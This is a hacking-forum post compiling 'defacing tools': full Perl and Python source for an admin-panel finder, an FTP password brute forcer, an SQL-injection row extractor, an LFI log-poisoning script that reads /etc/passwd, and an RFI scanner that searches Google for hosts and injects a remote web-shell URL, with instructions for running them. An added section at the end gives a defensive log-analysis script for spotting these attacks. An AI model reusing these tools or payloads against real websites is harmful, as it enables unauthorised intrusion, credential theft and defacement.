
Compilation of Defacing Tools.

Posted: 23 Mar 2010, 13:14
by Skillmax
Well, I'm stopping by here.. and leaving you this compilation I've made.
You can suggest more tools and I'll add them


Panel Finder by FOder

Brief explanation

- Program written in Perl to find the panel of any
website, letting you choose between .php or .asp

Code:

#!/usr/bin/perl

##
# By FoDer
# Admin Control Panel  ___ Version 1 
# 
##

use HTTP::Request;
use LWP::UserAgent;

system('cls');
system('title Panel Finder In Perl by Foder');

print"\n";
print "-----------------------------------------------\n" ;
print "[*]---Panel Finder In Perl by Foder--------[*]\n" ;
print "[*]-------------Coded By Foder----------[*]\n" ;
print "[*]------------- [email protected][*]\n" ;
print "*******************************************\n" ;
print "\n";

print "~# Web para escanear\n* ejemplo de web: www.ejemplo.com> ";
$site=<STDIN>;
chomp $site;

print "\n";
print "~ Codigo de lenguaje de la web \n* ex: asp, php-> ";
$code=<STDIN>;
chomp($code);

if ( $site !~ /^http:/ ) {
$site = 'http://' . $site;
}
if ( $site !~ /\/$/ ) {
$site = $site . '/';
}
print "\n";

print "->Sitio: $site\n";
print "->Sitio.: $code\n";
print "->Procesando..\n\n\n";

if($code eq "asp"){

@path1=('admin/','administrator/','moderator/','webadmin/','adminarea/','bb-admin/','adminLogin/','admin_area/','

panel-administracion/','instadmin/',
'memberadmin/','administratorlogin/','adm/','account.asp','admin/account.asp','admin/index.asp','admin/login.asp

','admin/admin.asp',
'admin_area/admin.asp','admin_area/login.asp','admin/account.html','admin/index.html','admin/login.html','admin

/admin.html',
'admin_area/admin.html','admin_area/login.html','admin_area/index.html','admin_area/index.asp','bb-admin/inde

x.asp','bb-admin/login.asp','bb-admin/admin.asp',
'bb-admin/index.html','bb-admin/login.html','bb-admin/admin.html','admin/home.html','admin/controlpanel.htm

l','admin.html','admin/cp.html','cp.html',
'administrator/index.html','administrator/login.html','administrator/account.html','administrator.html','login.html','

modelsearch/login.html','moderator.html',
'moderator/login.html','moderator/admin.html','account.html','controlpanel.html','admincontrol.html','admin_login.

html','panel-administracion/login.html',
'admin/home.asp','admin/controlpanel.asp','admin.asp','pages/admin/admin-login.asp','admin/admin-login.asp','a

dmin-login.asp','admin/cp.asp','cp.asp',
'administrator/account.asp','administrator.asp','login.asp','modelsearch/login.asp','moderator.asp','moderator/logi

n.asp','administrator/login.asp',
'moderator/admin.asp','controlpanel.asp','admin/account.html','adminpanel.html','webadmin.html','pages/admin/a

dmin-login.html','admin/admin-login.html',
'webadmin/index.html','webadmin/admin.html','webadmin/login.html','user.asp','user.html','admincp/index.asp','a

dmincp/login.asp','admincp/index.html',
'admin/adminLogin.html','adminLogin.html','admin/adminLogin.html','home.html','adminarea/index.html','adminar

ea/admin.html','adminarea/login.html',
'panel-administracion/index.html','panel-administracion/admin.html','modelsearch/index.html','modelsearch/adm

in.html','admin/admin_login.html',
'admincontrol/login.html','adm/index.html','adm.html','admincontrol.asp','admin/account.asp','adminpanel.asp','we

badmin.asp','webadmin/index.asp',
'webadmin/admin.asp','webadmin/login.asp','admin/admin_login.asp','admin_login.asp','panel-administracion/logi

n.asp','adminLogin.asp',
'admin/adminLogin.asp','home.asp','admin.asp','adminarea/index.asp','adminarea/admin.asp','adminarea/login.asp'

,'admin-login.html',
'panel-administracion/index.asp','panel-administracion/admin.asp','modelsearch/index.asp','modelsearch/admin.

asp','administrator/index.asp',
'admincontrol/login.asp','adm/admloginuser.asp','admloginuser.asp','admin2.asp','admin2/login.asp','admin2/inde

x.asp','adm/index.asp',
'adm.asp','affiliate.asp','adm_auth.asp','memberadmin.asp','administratorlogin.asp','siteadmin/login.asp','siteadmin

/index.asp','siteadmin/login.html'
);

foreach $ways(@path1){

$final=$site.$ways;

my $req=HTTP::Request->new(GET=>$final);
my $ua=LWP::UserAgent->new();
$ua->timeout(30);
my $response=$ua->request($req);

if($response->content =~ /Username/ ||
$response->content =~ /Password/ ||
$response->content =~ /username/ ||
$response->content =~ /password/ ||
$response->content =~ /USERNAME/ ||
$response->content =~ /PASSWORD/ ||
$response->content =~ /Senha/ ||
$response->content =~ /senha/ ||
$response->content =~ /Personal/ ||
$response->content =~ /Usuario/ ||
$response->content =~ /Clave/ ||
$response->content =~ /Usager/ ||
$response->content =~ /usager/ ||
$response->content =~ /Sing/ ||
$response->content =~ /passe/ ||
$response->content =~ /P\/W/ ||
$response->content =~ /Admin Password/
){
print " \n [+++++] Encontrado, este es el panel. -> $final\n\n";
}else{
print " Esta no es <- $final\n";
}
}
}




# -------------------------------------------------------
# -------------------test cfm ---------------------------|
# -------------------------------------------------------





if($code eq "cfm"){

@path1=('admin/','administrator/','moderator/','webadmin/','adminarea/','bb-admin/','adminLogin/','admin_area/','

panel-administracion/','instadmin/',
'memberadmin/','administratorlogin/','adm/','account.cfm','admin/account.cfm','admin/index.cfm','admin/login.cf

m','admin/admin.cfm',
'admin_area/admin.cfm','admin_area/login.cfm','admin/account.html','admin/index.html','admin/login.html','admi

n/admin.html',
'admin_area/admin.html','admin_area/login.html','admin_area/index.html','admin_area/index.cfm','bb-admin/inde

x.cfm','bb-admin/login.cfm','bb-admin/admin.cfm',
'bb-admin/index.html','bb-admin/login.html','bb-admin/admin.html','admin/home.html','admin/controlpanel.htm

l','admin.html','admin/cp.html','cp.html',
'administrator/index.html','administrator/login.html','administrator/account.html','administrator.html','login.html','

modelsearch/login.html','moderator.html',
'moderator/login.html','moderator/admin.html','account.html','controlpanel.html','admincontrol.html','admin_login.

html','panel-administracion/login.html',
'admin/home.cfm','admin/controlpanel.cfm','admin.cfm','pages/admin/admin-login.cfm','admin/admin-login.cfm',

'admin-login.cfm','admin/cp.cfm','cp.cfm',
'administrator/account.cfm','administrator.cfm','login.cfm','modelsearch/login.cfm','moderator.cfm','moderator/log

in.cfm','administrator/login.cfm',
'moderator/admin.cfm','controlpanel.cfm','admin/account.html','adminpanel.html','webadmin.html','pages/admin/a

dmin-login.html','admin/admin-login.html',
'webadmin/index.html','webadmin/admin.html','webadmin/login.html','user.cfm','user.html','admincp/index.cfm','a

dmincp/login.cfm','admincp/index.html',
'admin/adminLogin.html','adminLogin.html','admin/adminLogin.html','home.html','adminarea/index.html','adminar

ea/admin.html','adminarea/login.html',
'panel-administracion/index.html','panel-administracion/admin.html','modelsearch/index.html','modelsearch/adm

in.html','admin/admin_login.html',
'admincontrol/login.html','adm/index.html','adm.html','admincontrol.cfm','admin/account.cfm','adminpanel.cfm','w

ebadmin.cfm','webadmin/index.cfm',
'webadmin/admin.cfm','webadmin/login.cfm','admin/admin_login.cfm','admin_login.cfm','panel-administracion/lo

gin.cfm','adminLogin.cfm',
'admin/adminLogin.cfm','home.cfm','admin.cfm','adminarea/index.cfm','adminarea/admin.cfm','adminarea/login.cf

m','admin-login.html',
'panel-administracion/index.cfm','panel-administracion/admin.cfm','modelsearch/index.cfm','modelsearch/admin.

cfm','administrator/index.cfm',
'admincontrol/login.cfm','adm/admloginuser.cfm','admloginuser.cfm','admin2.cfm','admin2/login.cfm','admin2/ind

ex.cfm','adm/index.cfm',
'adm.cfm','affiliate.cfm','adm_auth.cfm','memberadmin.cfm','administratorlogin.cfm','siteadmin/login.cfm','siteadm

in/index.cfm','siteadmin/login.html'
);

foreach $ways(@path1){

$final=$site.$ways;

my $req=HTTP::Request->new(GET=>$final);
my $ua=LWP::UserAgent->new();
$ua->timeout(30);
my $response=$ua->request($req);

if($response->content =~ /Username/ ||
$response->content =~ /Password/ ||
$response->content =~ /username/ ||
$response->content =~ /password/ ||
$response->content =~ /USERNAME/ ||
$response->content =~ /PASSWORD/ ||
$response->content =~ /Senha/ ||
$response->content =~ /senha/ ||
$response->content =~ /Personal/ ||
$response->content =~ /Usuario/ ||
$response->content =~ /Clave/ ||
$response->content =~ /Usager/ ||
$response->content =~ /usager/ ||
$response->content =~ /Sing/ ||
$response->content =~ /passe/ ||
$response->content =~ /P\/W/ ||
$response->content =~ /Admin Password/
){
print " \n [+] Este es el panel -> $final\n\n";
}else{
print "[-] Este no es el panel <- $final\n";
}
}
}





# -------------------------------------------------------
#--------------------------/test-------------------------|
# -------------------------------------------------------


if($code eq "php"){

@path2=('admin/','administrator/','moderator/','webadmin/','adminarea/','bb-admin/','adminLogin/','admin_area/','

panel-administracion/','instadmin/',
'memberadmin/','administratorlogin/','adm/','admin/account.php','admin/index.php','admin/login.php','admin/ad

min.php','admin/account.php',
'admin_area/admin.php','admin_area/login.php','siteadmin/login.php','siteadmin/index.php','siteadmin/login.html'

,'admin/account.html','admin/index.html','admin/login.html','admin/admin.html',
'admin_area/index.php','bb-admin/index.php','bb-admin/login.php','bb-admin/admin.php','admin/home.php','ad

min_area/login.html','admin_area/index.html',
'admin/controlpanel.php','admin.php','admincp/index.asp','admincp/login.asp','admincp/index.html','admin/accou

nt.html','adminpanel.html','webadmin.html',
'webadmin/index.html','webadmin/admin.html','webadmin/login.html','admin/admin_login.html','admin_login.html

','panel-administracion/login.html',
'admin/cp.php','cp.php','administrator/index.php','administrator/login.php','nsw/admin/login.php','webadmin/logi

n.php','admin/admin_login.php','admin_login.php',
'administrator/account.php','administrator.php','admin_area/admin.html','pages/admin/admin-login.php','admin/a

dmin-login.php','admin-login.php',
'bb-admin/index.html','bb-admin/login.html','bb-admin/admin.html','admin/home.html','login.php','modelsearch/

login.php','moderator.php','moderator/login.php',
'moderator/admin.php','account.php','pages/admin/admin-login.html','admin/admin-login.html','admin-login.htm

l','controlpanel.php','admincontrol.php',
'admin/adminLogin.html','adminLogin.html','admin/adminLogin.html','home.html','rcjakar/admin/login.php','admin

area/index.html','adminarea/admin.html',
'webadmin.php','webadmin/index.php','webadmin/admin.php','admin/controlpanel.html','admin.html','admin/cp.ht

ml','cp.html','adminpanel.php','moderator.html',
'administrator/index.html','administrator/login.html','user.html','administrator/account.html','administrator.html','l

ogin.html','modelsearch/login.html',
'moderator/login.html','adminarea/login.html','panel-administracion/index.html','panel-administracion/admin.htm

l','modelsearch/index.html','modelsearch/admin.html',
'admincontrol/login.html','adm/index.html','adm.html','moderator/admin.html','user.php','account.html','controlpa

nel.html','admincontrol.html',
'panel-administracion/login.php','wp-login.php','adminLogin.php','admin/adminLogin.php','home.php','admin.php',

'adminarea/index.php',
'adminarea/admin.php','adminarea/login.php','panel-administracion/index.php','panel-administracion/admin.php',

'modelsearch/index.php',
'modelsearch/admin.php','admincontrol/login.php','adm/admloginuser.php','admloginuser.php','admin2.php','admi

n2/login.php','admin2/index.php',
'adm/index.php','adm.php','affiliate.php','adm_auth.php','memberadmin.php','administratorlogin.php'
);

foreach $ways(@path2){

$final=$site.$ways;

my $req=HTTP::Request->new(GET=>$final);
my $ua=LWP::UserAgent->new();
$ua->timeout(30);
my $response=$ua->request($req);

if($response->content =~ /Username/ ||
$response->content =~ /Password/ ||
$response->content =~ /username/ ||
$response->content =~ /password/ ||
$response->content =~ /USERNAME/ ||
$response->content =~ /PASSWORD/ ||
$response->content =~ /Senha/ ||
$response->content =~ /senha/ ||
$response->content =~ /Personal/ ||
$response->content =~ /Usuario/ ||
$response->content =~ /Clave/ ||
$response->content =~ /Usager/ ||
$response->content =~ /usager/ ||
$response->content =~ /Sing/ ||
$response->content =~ /passe/ ||
$response->content =~ /P\/W/ ||
$response->content =~ /Admin Password/
){
print " \n [+++++++] Encontrado este es el panel -> $final\n\n";
}else{
print " Esta no es el panel. <- $final\n";
}
}
kill("STOP",NULL);
}










FTP Brute Forcer by God_MurdoC

Brief explanation:

- Program that brute-forces via FTP

Code:

#!usr/bin/python
#Ftp Brute Forcer

import threading, time, random, sys, ftplib
from ftplib import FTP
from copy import copy

if len(sys.argv) !=4:
	print "Usage: ./ftpbrute.py <server> <userlist> <wordlist>"
	sys.exit(1)

try:
  	users = open(sys.argv[2], "r").readlines()
except(IOError): 
  	print "Error: Check your userlist path\n"
  	sys.exit(1)
  
try:
  	words = open(sys.argv[3], "r").readlines()
except(IOError): 
  	print "Error: Check your wordlist path\n"
  	sys.exit(1)

print "\n\t   d3hydr8[at]gmail[dot]com ftpBruteForcer v1.0"
print "\t--------------------------------------------------\n"
print "[+] Server:",sys.argv[1]
print "[+] Users Loaded:",len(users)
print "[+] Words Loaded:",len(words),"\n"

try:
	f = FTP(sys.argv[1])
	print "[+] Response:",f.getwelcome()
except (ftplib.all_errors):
	pass

try:
	print "\n[+] Checking for anonymous login\n"
	ftp = FTP(sys.argv[1])
	ftp.login()
	ftp.retrlines('LIST')
	print "\t\nAnonymous login successful!!!\n"
	ftp.quit()
except (ftplib.all_errors): 
	print "\tAnonymous login unsuccessful\n"

wordlist = copy(words)

def reloader():
	for word in wordlist:
		words.append(word)

def getword():
	lock = threading.Lock()
	lock.acquire()
	if len(words) != 0:
		value = random.sample(words,  1)
		words.remove(value[0])		
	else:
		print "\nReloading Wordlist - Changing User\n"
		reloader()
		value = random.sample(words,  1)
		users.remove(users[0])
		
	lock.release()
	if len(users) ==1:
		return value[0][:-1], users[0]
	else:
		return value[0][:-1], users[0][:-1]
		
class Worker(threading.Thread):
	
	def run(self):
		value, user = getword()
		try:
			print "-"*12
			print "User:",user,"Password:",value
			ftp = FTP(sys.argv[1])
			ftp.login(user, value)
			ftp.retrlines('LIST')
			print "\t\nLogin successful:",value, user
			ftp.quit()
			work.join()
			sys.exit(2)
		except (ftplib.all_errors), msg: 
			#print "An error occurred:", msg
			pass
 
for i in range(len(words)*len(users)):
	work = Worker()
	work.start()
	time.sleep(1)


Limit Sqli (Perl Script) by Descendent Group

Brief explanation:

- Program written in Perl that extracts all the records of an SQLi statement.

Code:

system("cls");
print "|----------------------------------------------------|\n";  
print "|                   Limit SQLi                       |\n";  
print "|        Limit One by One Your Sql Injection         |\n";  
print "|                  By Descendents                    |\n";
print "|----------------------------------------------------|\n";  
print "Example:\n";
print "http://testphp.acunetix.com/artists.php?artist=-2\n";
print "union all select 1,concat(0x3b,0x3b,0x3b,column_name,0x3b,0x3b,0x3b),3\n";
print "from information_schema.columns"; 

use LWP::UserAgent; 

print "\n\n\nSTEP1 \nTarget:[http://wwww.target.com/path=SQL INJECTION]: ";  

chomp(my $target=<STDIN>);  

system("cls");

print "Example: ;;;\n\n";

print "\nSTEP2 \nSearch Result String Between: ";  

chomp(my $e1=<STDIN>); 

print "\n\nExample: ;;;\n";

print "\nAnd: ";

chomp(my $e2=<STDIN>); 

system("cls");

print "If you want delete some string of the result. You can do it now.\n";
print "Write string that you want delete.\n";
print "If you dont want delete any string, dont write nothing.\n";

print "\n\nSTEP3 \nFirst Debug String:";  

chomp(my $de=<STDIN>);

print "\n\nSecond Debug String:";  

chomp(my $de2=<STDIN>);

system("cls");

print "STEP4 \nDo you know how many records there are? OR \nDo you want force the number of the records?\nYes=1 No=2 Default=No: ";
chomp(my $op2=<STDIN>);
if ($op2==1){
 print "\nHow Many?: ";
 chomp(my $how=<STDIN>);
 $nu=$how;  
}
else {
$nu=10000000;
}

system("cls");

print "STEP5 \nDo you want save the result in a file? Yes=1 No=2 Default=No: ";
chomp(my $op=<STDIN>);
if ($op==1){
 print "\nSave Path File: ";
 chomp(my $path=<STDIN>);
 open(FILEHANDLE, ">".$path) or die 'cannot open file!';  
}

$b = LWP::UserAgent->new() or die "Could not initialize browser\n";  

$b->agent('Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)');  

for($num = 0; $num < $nu; $num++) {

 $host = $target." limit ".$num.",1--";  

 $res = $b->request(HTTP::Request->new(GET=>$host));  

 $answer = $res->content; 

 #if ($answer=~ /<h2 id='pageName'>artist: (.*?)<\/h2>/is){
 #if ($answer=~ /$e1 (.*?)$e2/is){
 #if ($answer=~/<$e1[^>]*>(.*?)<\/$e1>/){
  if ($answer=~/$e1(.*?)$e2/){

   $string =$1;   
   $string =~ s/$de/ /g;
   $stringfinal =$string;   
   $stringfinal =~ s/$de2/ /g;
   print "\n[+] ".$num." : $stringfinal"; 
   if ($op==1){
     print FILEHANDLE "\n[+] ".$num." : $stringfinal"; 
   } 
   

 }
 else{
  if ($op2!=1){ 
  last;
  } 
  if ($op==1){
   close(FILEHANDLE);
  }
 } 
}


[Perl LFI Scanner] By ShadinessDark


Code:

#!/usr/bin/perl
# LFI Scanner By ShadinessDark
# Www.ethical-security.co.cc

use LWP::UserAgent;

system("cls");
#system("clear");

print " -------------------------------------------------\n";
print " [LFI Scanner]                                    \n";
print " -------------------------------------------------\n";
print " Insert Bugged Site (http://site.com/?p=):        \n";
chomp($site = <STDIN>);
print " -------------------------------------------------\n";
print " Insert php command to execute (with <?php ?>):   \n";
chomp($cmd = <STDIN>);
print " Insert Logs path ( ex ../../../etc/passwd ):     \n";
chomp($path = <STDIN>);
print " -------------------------------------------------\n";
print " Ok... Espere porfavor                            \n";
print " -------------------------------------------------\n";

#Infect Logs
$lwp = LWP::UserAgent->new;
$ua = $lwp->get($site);
$lwp->agent('coderz'.$cmd.'/coderz');

#Control
$ua = $lwp->get($site.$path.'%00');
if($ua->content =~ m/cod3rz/) {
   print " Ok ".$site.$paths[$i]." is infected              \n";
   print " -------------------------------------------------\n";
}

RFI Scanner

Brief explanation:

- Program written in Python that extracts the RFI sequences

Code:

#!/usr/bin/python
#RFI Scanner that can find hosts using a google query or search one site.
#When the scan is complete 
#it will print out the rfi's found and or write to file. It also has verbose mode for more
#output.

#http://darkcode.ath.cx
#d3hydr8[at]gmail[dot]com

import sys, urllib2, re, sets, random, httplib, time, socket

def title():
    print "\n\t   d3hydr8[at]gmail[dot]com RFI Scanner v1.0"
    print "\t-----------------------------------------------"
    
def usage():
    title()
    print "\n  Usage: python RFIscan.py <option>\n"
    print "\n  Example: python RFIscan.py -g inurl:'.gov' 200 -s 'http://localhost/shell.txt' -write rfi_found.txt -v\n"
    print "\t[options]"
    print "\t   -g/-google <query> <num of hosts> : Searches google for hosts"
    print "\t   -t/-target <website> <port>: Searches just that site, (default port 80)"
    print "\t   -s/-shell <shell> : Shell location"    
    print "\t   -w/-write <file> : Writes potential XSS found to file"
    print "\t   -v/-verbose : Verbose Mode\n"

def StripTags(text):
     finished = 0
     while not finished:
         finished = 1
         start = text.find("<")
         if start >= 0:
             stop = text[start:].find(">")
             if stop >= 0:
                 text = text[:start] + text[start+stop+1:]
                 finished = 0
     return text
    
def timer():
    now = time.localtime(time.time())
    return time.asctime(now)

def geturls(query):
    
    counter =  10
    urls = []
    
    while counter < int(sys.argv[3]):
        url = 'http://www.google.com/search?hl=en&q='+query+'&hl=en&lr=&start='+repr(counter)+'&sa=N'
        opener = urllib2.build_opener(url)
        opener.addheaders = [('User-agent', 'Mozilla/4.0 (compatible; MSIE 5.5; Windows NT)')]
        data = opener.open(url).read()
        hosts = re.findall(('\w+\.[\w\.\-/]*\.\w+'),StripTags(data))
        #Lets add sites found to a list if not already or a google site.
        #We don't want to upset the people that got our list for us.
        for x in hosts:
            if x.find('www') != -1:
                x = x[x.find('www'):]
            if x not in urls and re.search("google", x) == None:
                urls.append(x)
        counter += 10
    return urls

def getvar(site):
    
    names = []
    actions = []
    print "\n","-"*45
    print "[+] Searching:",site
    try:
        webpage = urllib2.urlopen(proto+"://"+site, port).read()
        var = re.findall("\?[\w\.\-/]*\=",webpage)
        if len(var) >=1:
            var = list(sets.Set(var))
        found_action = re.findall("action=\"[\w\.\-/]*\"", webpage.lower())
        found_action = list(sets.Set(found_action))
        if len(found_action) >= 1:
            for a in found_action:
                a = a.split('"',2)[1]
                try:
                    if a[0] != "/":
                        a = "/"+a
                except(IndexError):
                        pass
                actions.append(a)
        found_names = re.findall("name=\"[\w\.\-/]*\"", webpage.lower())
        found_names = list(sets.Set(found_names))
        for n in found_names:
            names.append(n.split('"',2)[1])
        print "[+] Variables:",len(var),"| Actions:",len(actions),"| Fields:",len(names)
        print "[+] Avg Requests:",(len(var)+len(names)+(len(actions)*len(names))+(len(actions)*len(names)))
        if len(var) >= 1:
            for v in var:
                if site.count("/") >= 2:
                    for x in xrange(site.count("/")):
                        tester(site.rsplit('/',x+1)[0]+"/"+v+shell)
                tester(site+"/"+v+shell)
        
        if len(names) >= 1:
            for n in names:
                if site.count("/") >= 2:
                    for x in xrange(site.count("/")):
                        tester(site.rsplit('/',x+1)[0]+"/"+"?"+n+"="+shell)
                tester(site+"/"+"?"+n+"="+shell)
        
        if len(actions) != 0 and len(names) >= 1:
            for a in actions:
                for n in names:
                    if site.count("/") >= 2:
                        for x in xrange(site.count("/")):
                            tester(site.rsplit('/',x+1)[0]+a+"?"+n+"="+shell)
                    #tester(site.split("/")[0]+a+"?"+n+"="+shell)
            
        if len(actions) != 0 and len(var) >= 1:
            for a in actions:
                for v in var:
                    if site.count("/") >= 2:
                        for x in xrange(site.count("/")):
                            tester(site.rsplit('/',x+1)[0]+a+v+shell)
                    else:
                        tester(site.split("/")[0]+a+v+shell)    
        if sys.argv[1].lower() == "-g" or sys.argv[1].lower() == "-google":
            urls.remove(site)
    
    except(socket.timeout, IOError, ValueError, socket.error, socket.gaierror, httplib.BadStatusLine):
        if sys.argv[1].lower() == "-g" or sys.argv[1].lower() == "-google":
            urls.remove(site)
        pass
    except(KeyboardInterrupt):
        print "\n[-] Cancelled -",timer(),"\n"
        sys.exit(1)
            
def tester(victim):
    
    if verbose ==1:
        print "Target:",victim
    try:
        source = urllib2.urlopen(proto+"://"+victim, port).read()
        h = httplib.HTTPConnection(victim.split('/')[0], int(port))
        try:
            h.request("GET", "/"+victim.split('/',1)[1])
        except(IndexError):
            h.request("GET", "/")
        r1 = h.getresponse()
        if verbose ==1:
            print "\t[+] Response:",r1.status, r1.reason
        if re.search(title, source) != None and r1.status not in range(303, 418):
            if victim not in found_rfi:
                print "\n[!] RFI:", victim
                print "\t[+] Response:",r1.status, r1.reason
                found_rfi.append(victim)
    except(socket.timeout, socket.gaierror, socket.error, IOError, ValueError, httplib.BadStatusLine, httplib.IncompleteRead, httplib.InvalidURL):
        pass
    except(KeyboardInterrupt):
        print "\n[-] Cancelled -",timer(),"\n"
        sys.exit(1)
    except():
        pass
                
if len(sys.argv) <= 3:
    usage()
    sys.exit(1)
 
for arg in sys.argv[1:]:
    if arg.lower() == "-v" or arg.lower() == "-verbose":
        verbose = 1
    if arg.lower() == "-w" or arg.lower() == "-write":
        txt = sys.argv[int(sys.argv[1:].index(arg))+2]
    if arg.lower() == "-s" or arg.lower() == "-shell":
        shell = sys.argv[int(sys.argv[1:].index(arg))+2]
        
title()
socket.setdefaulttimeout(3)
found_rfi = []
done = []
count = 0
proto = "http"
print "\n[+] RFI_scan Loaded"
try:
    if verbose ==1:
        print "[+] Verbose Mode On"
except(NameError):
    verbose = 0
    print "[-] Verbose Mode Off"
try:
    source = urllib2.urlopen(shell).read()
    title =  str(re.findall("<title>.*</title>",source)[0])
    if title.find('c99shell') != -1:
        title = "c99shell"
    if title.find('r57') != -1:
        title = "r57"
except(IndexError), msg:
    print msg
    print "\n[-] Improper Shell Location in Path\n"
    print "[-] Option: -s/-shell\n"
    sys.exit(1)
except(urllib2.HTTPError, urllib2.URLError), msg:
    print "\n[-] Couldn't connect to shell?"
    print "[-] Message:",msg,"\n"
    sys.exit(1)
print "[+] Shell:",shell
if title != "c99shell" and title != "r57":
    print "[+] Shell Title:",title.rsplit("</title>",1)[0].split("<title>",1)[1]
else:
    print "[+] Shell Title:",title
try:
    if txt:
        print "[+] File:",txt
except(NameError):
    txt = None
    pass

if sys.argv[1].lower() == "-g" or sys.argv[1].lower() == "-google":    
    try:
        if sys.argv[3].isdigit() == False:
            print "\n[-] Argument [",sys.argv[3],"] must be a number.\n"
            sys.exit(1)
        else:
            if int(sys.argv[3]) <= 10:
                print "\n[-] Argument [",sys.argv[3],"] must be greater than 10.\n"
                sys.exit(1)
    except(IndexError):
            print "\n[-] Need number of hosts to collect.\n"
            sys.exit(1)
    query = re.sub("\s","+",sys.argv[2])
    port = "80"
    print "[+] Query:",query
    print "[+] Querying Google..."
    urls = geturls(query)
    print "[+] Collected:",len(urls),"hosts"
    print "[+] Started:",timer()
    print "\n[-] Cancel: Press Ctrl-C"
    time.sleep(3)
    while len(urls) > 0:
        print "-"*45
        print "\n[-] Length:",len(urls),"remain"
        getvar(random.choice(urls))
if sys.argv[1].lower() == "-t" or sys.argv[1].lower() == "-target":
    site = sys.argv[2]
    try:
        if sys.argv[3].isdigit() == False:
            port = "80"
        else:
            port = sys.argv[3]
    except(IndexError):
        port = "80"
    print "[+] Site:",site
    print "[+] Port:",port
    if site[:7] == "http://":
        site = site.replace("http://","")
    if site[:8] == "https://":
        proto = "https"
        if port == "80":
            print "[!] Using port 80 with https? (443)"
        site = site.replace("https://","")
    print "[+] Started:",timer()
    print "\n[-] Cancel: Press Ctrl-C"
    time.sleep(4)
    getvar(site)

print "-"*65
print "\n\n[+] Potential RFI found:",len(found_rfi),"\n"
time.sleep(3)
if txt != None and len(found_rfi) >=1:
    rfi_file = open(txt, "a")
    rfi_file.writelines("\n\td3hydr8[at]gmail[dot]com RFI Scanner v1.0\n")
    rfi_file.writelines("\t------------------------------------------\n\n")
    print "[+] Writing Data:",txt
else:
    print "[-] No data written to disk"
for k in found_rfi:
    count+=1
    if txt != None:
        rfi_file.writelines("["+str(count)+"] "+k+"\n")
        print "\n["+str(count)+"]",k
print "\n[-] Done -",timer(),"\n"

SQLi Helper 2.7

- Brief explanation: .exe program that scans a website by performing SQL injection.
uploaded by xassiz


Download link:

[External link removed for guests] ... xassiz.rar



--------------------------------------------------------------------------------


These are the most essential tools for "hacking" a website.


I'll keep updating as more come out; all the tools written
in Perl and Python need an interpreter program.


Interpreter program for Perl:


[External link removed for guests]


Supported operating systems: Win98/98SE/Me/2000/NT/XP/2003/Vista


Interpreter program for Python:


[External link removed for guests]


Supported operating systems: Win98/98SE/Me/2000/NT/XP/2003/Vista



-------------------------------------------------------------------


Usage and explanation:


For the code given in this post for each tool to work, you need to
follow these steps:

- Open Notepad
- Copy the tool's code
- Save it as "Herramienta.pl" for Perl and "Herramienta.py" for Python


That's all, I hope you liked it.



Regards!
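
Seen from the server side, the scripts in the post above leave recognizable traces in a web access log. The following is an added example, not part of the original post or of any of the tools' own code: a Python log triage that flags admin-path enumeration, `limit N,1--` offset walking, PHP tags in the User-Agent, traversal or null-byte parameters, and remote-URL parameter values. The log lines, addresses, thresholds and label names are constructed assumptions.

```python
import re
from collections import defaultdict
from urllib.parse import parse_qsl, unquote

# "combined" log format: ip - - [time] "METHOD target PROTO" status size "referer" "ua"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+ "[^"]*" "(?P<ua>.*)"$'
)
ADMIN_WORDS = re.compile(r"admin|login|moderator|controlpanel", re.I)
LIMIT_WALK = re.compile(r"\blimit\s+(\d+)\s*,\s*1\s*--", re.I)
REMOTE_URL = re.compile(r"^(?:https?|ftp)://", re.I)

PANEL_THRESHOLD = 5  # assumed: distinct admin-like paths answered 404, per client
LIMIT_THRESHOLD = 3  # assumed: distinct LIMIT offsets requested, per client


def analyze(lines):
    """Return {client_ip: sorted list of finding labels} for access-log lines."""
    admin_404 = defaultdict(set)
    limit_offsets = defaultdict(set)
    findings = defaultdict(set)

    for line in lines:
        m = LOG_RE.match(line.strip())
        if not m:
            continue  # unparseable line: skip rather than guess
        ip, target, ua = m["ip"], m["target"], m["ua"]
        path, _, query = target.partition("?")
        decoded = unquote(target)

        # Panel finder: many guesses at admin/login paths, almost all 404.
        if m["status"] == "404" and ADMIN_WORDS.search(path):
            admin_404[ip].add(path.lower())
        # Limit SQLi: the same injected query repeated with limit 0,1-- 1,1-- ...
        hit = LIMIT_WALK.search(decoded)
        if hit:
            limit_offsets[ip].add(int(hit.group(1)))
        # LFI scanner: PHP placed in the User-Agent so that it lands in the log.
        if "<?" in ua:
            findings[ip].add("php-in-user-agent")
        # LFI scanner: include path with ../ sequences and a trailing %00.
        if "%00" in target or "../" in decoded:
            findings[ip].add("traversal-or-null-byte")
        # RFI scanner: a parameter whose value is itself a remote URL.
        if any(REMOTE_URL.match(v) for _, v in parse_qsl(query)):
            findings[ip].add("remote-url-parameter")

    for ip, paths in admin_404.items():
        if len(paths) >= PANEL_THRESHOLD:
            findings[ip].add("panel-enumeration")
    for ip, offsets in limit_offsets.items():
        if len(offsets) >= LIMIT_THRESHOLD:
            findings[ip].add("sqli-limit-walk")
    return {ip: sorted(labels) for ip, labels in findings.items()}


def _line(ip, target, status, ua):
    """Build one constructed log line in combined format."""
    return (f'{ip} - - [23/Mar/2010:13:14:00 +0000] "GET {target} HTTP/1.1" '
            f'{status} 512 "-" "{ua}"')


MOZ = "Mozilla/5.0 (X11; Linux x86_64)"
PHP_UA = "coderz<?php echo 1; ?>/coderz"
# Constructed sample traffic; all addresses are documentation ranges.
SAMPLE_LOG = [
    _line("192.0.2.5", "/index.html", 200, MOZ),
    _line("192.0.2.5", "/login.php", 200, MOZ),
    _line("192.0.2.5", "/admin/", 404, MOZ),
    *[_line("203.0.113.10", p, 404, "libwww-perl/5.834") for p in
      ("/admin/", "/administrator/", "/moderator/", "/webadmin/", "/admin/login.php")],
    *[_line("203.0.113.20",
            f"/artists.php?artist=-2%20union%20all%20select%201,2,3%20limit%20{n},1--",
            200, MOZ) for n in range(3)],
    _line("203.0.113.30", "/?p=", 200, PHP_UA),
    _line("203.0.113.30", "/?p=../../../etc/passwd%00", 200, PHP_UA),
    _line("203.0.113.40", "/index.php?page=http://localhost/shell.txt", 200, MOZ),
]

if __name__ == "__main__":
    for ip, labels in sorted(analyze(SAMPLE_LOG).items()):
        print(ip, ", ".join(labels))
```

A single 404 on `/admin/` from an ordinary visitor stays below the threshold; the remote-URL check will also match legitimate redirect parameters, so treat it as a triage signal rather than a verdict.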

Re: Compilation of Defacing Tools.

